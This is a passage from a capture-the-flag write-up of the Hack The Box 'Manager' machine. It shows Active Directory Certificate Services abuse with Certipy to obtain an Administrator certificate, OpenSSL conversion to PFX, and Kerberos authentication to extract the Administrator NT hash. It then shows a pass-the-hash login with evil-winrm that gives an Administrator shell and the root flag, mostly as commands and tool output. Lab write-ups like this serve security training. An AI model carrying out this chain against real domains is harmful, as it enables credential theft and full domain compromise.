[-] Got error while trying to issue certificate: code: 0x80094003 - CERTSRV_E_BAD_REQUESTSTATUS - The request's current status does not allow this operation.
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Rerieving certificate with ID 14
[*]Successfully retrieved certificate
[*]Got certificate with UPN 'administrator@10.10.11.236'
[*]Certificate has no object SID
[!] Could not find matching private key. Saving certificate as PEM
[*]Saved certificate to 'administrator.crt'

To convert a .crt certificate file to a .pfx file, you can use OpenSSL¹²³. Here are the steps:

  1. Download and install OpenSSL¹. On Windows you can download it from the Win32 OpenSSL page (source 4).
  2. Run the following command in your terminal¹³:
openssl pkcs12 -export -out certificate.pfx -inkey privateKey.key -in certificate.crt -certfile CACert.crt

In this command:

  • certificate.pfx is the name of the output PFX file.
  • privateKey.key is your private key.
  • certificate.crt is your .crt certificate.
  • CACert.crt is your certificate authority's certificate.

Please replace privateKey.key, certificate.crt, and CACert.crt with your actual file names¹³. The private key must be the one generated for the same request as the certificate (here, the .key file Certipy saved when it made the request), otherwise OpenSSL refuses to build the PFX; the -certfile argument is optional.

After running this command, you should have a .pfx file that you can use¹³.

Sources:
(1) ssl certificate - How to convert .crt cetificate file to .pfx - Stack Overflow. https://stackoverflow.com/questions/9971464/how-to-convert-crt-cetificate-file-to-pfx
(2) SSL Converter - Convert SSL Certificates to different formats. https://www.sslshopper.com/ssl-converter.html
(3) How do I convert CRT to PFX, or get a PFX certificate. https://community.godaddy.com/s/question/0D53t00006Vm6vXCAR/how-do-i-convert-crt-to-pfx-or-get-a-pfx-certificate
(4) Win32/Win64 OpenSSL. https://slproweb.com/products/Win32OpenSSL.html
(5) SSL Converter | from or to: crt, cer, pem, der, pkcs#7, p7b, pfx - HTTPCS. https://www.httpcs.com/en/ssl-converter

After we have the .pfx, we authenticate with it to obtain the Administrator hash:

sudo certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Using principal: administrator@manager.htb
[*]Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

If this step fails with KRB_AP_ERR_SKEW, the fix is to synchronize the local clock with the domain controller: Kerberos tolerates only a few minutes of skew (five by default), and the nmap scan already showed the DC about seven hours ahead of us. This can be done by executing the following command:

sudo ntpdate -u manager.htb
┌──(root㉿kali)-[~/Desktop/manager/HTB_Manager]
└─$ sudo ntpdate 10.10.11.236
2023-12-12 02:19:29.635901 (+0530) +48668.980238 +/- 0.050721 10.10.11.236 s1 no-leap
CLOCK: time stepped by 48668.980238

┌──(root㉿kali)-[~/Desktop/manager/HTB_Manager]
└─$ sudo certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
[sudo] password for megatron:
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Using principal: administrator@manager.htb
[*]Trying to get TGT...
[*]Got TGT
[*]Saved credential cache to 'administrator.ccache'
[*]Trying to retrieve NT hash for 'administrator'
[*]Got hash for 'administrator@manager.htb': aad3b43********************************

After successfully obtaining the Administrator NT hash, I used it to log in with elevated privileges: evil-winrm accepts the hash in place of a password (pass-the-hash, the -H option). This gave me a shell as Administrator, and from there I retrieved the root flag.

┌──(root㉿kali)-[/home/megatron/Desktop/manager/HTB_Manager]
└─# evil-winrm -i 10.10.11.236 -u administrator -H ae*******************

                                       
Evil-WinRM shell v3.5
                                       
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                       
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                       
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop/
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime        Length Name
----                -------------        ------ ----
-ar---      12/11/2023  8:47 AM            34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
ba*******************************91
*Evil-WinRM* PS C:\Users\Administrator\Desktop>